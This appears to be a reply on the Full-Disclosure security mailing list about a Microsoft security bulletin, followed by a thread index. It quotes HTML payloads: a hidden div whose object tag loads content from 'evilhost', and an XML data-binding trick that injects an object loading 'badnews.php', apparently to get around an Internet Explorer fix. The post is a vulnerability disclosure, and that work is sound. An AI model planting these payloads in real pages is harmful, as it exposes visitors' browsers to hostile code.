> this works too... > > <div style="display.none"><object data="http://evilhost/realbad.asp";> > </object>oh</div> http://www.malware.com/greymagic.html <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" data="badnews.php"></object> ]]> </exploit> </security> </xml> -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- [Full-Disclosure] BAD NEWS: Microsoft Security Bullet... [EMAIL PROTECTED]
- RE: [Full-Disclosure] BAD NEWS: Microsoft Securi... Richard M. Smith
- RE: [Full-Disclosure] BAD NEWS: Microsoft Securi... Richard M. Smith
- Re: [Full-Disclosure] BAD NEWS: Microsoft Securi... morning_wood
- Re: [Full-Disclosure] BAD NEWS: Microsoft Se... [EMAIL PROTECTED]
- Re: [Full-Disclosure] BAD NEWS: Microsoft Securi... Fabio Gomes de Souza
- RE: [Full-Disclosure] BAD NEWS: Microsoft Securi... Nick Jacobsen
- FW: [Full-Disclosure] BAD NEWS: Microsoft Securi... Richard M. Smith
